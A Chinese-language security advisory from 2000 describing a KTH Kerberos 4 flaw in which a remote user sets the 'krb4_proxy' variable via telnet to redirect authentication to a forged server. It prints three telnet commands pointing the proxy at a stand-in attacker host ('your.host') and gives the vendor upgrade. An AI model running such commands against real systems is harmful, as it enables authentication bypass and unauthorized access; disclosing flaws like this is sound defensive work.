发布日期：2000-12-12
更新日期：2000-12-12

受影响系统：

    KTH Kerberos 4 1.0.3-1.0以及更低版本

不受影响系统：

    KTH Kerberos 4 1.0.4

描述：

---

Kerberos 是一种广泛使用的网络服务验证系统。KTH(瑞典皇家科学院)开发维护的的
某些版本存在设计上的缺陷。如果环境变量'krb4_proxy'被设置，表示需要通过一个
HTTP代理服务器获取票据，而不是缺省的Kerberos Server，此时KTH Kerberos从环
境变量'krb4_proxy'获取这个代理服务器地址。恶意的远程用户在验证开始前通过
telnet等技术远程设置该环境变量，最终导向一个伪装过的Kerberos Server，攻击
者可以截取服务程序发来的验证请求并返回一个伪装过的应答，以致恶意用户可以非
法访问服务程序。结合Bugtraq ID 2091所描述的缓冲区溢出漏洞，恶意用户可能非
法获取最高特权。

<* 来源：Jouko Pynnonen (jouko@solutions.fi) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

telnet> environ define krb4_proxy http://your.host:80
telnet> environ export krb4_proxy
telnet> open localhost


建议：

---

厂商补丁：

    升级到 KTH Kerberos 4 version 1.0.4：
    ftp://ftp.pdc.kth.se/pub/krb/src/krb4-1.0.4.tar.gz


浏览次数：5435
严重程度：0（网友投票）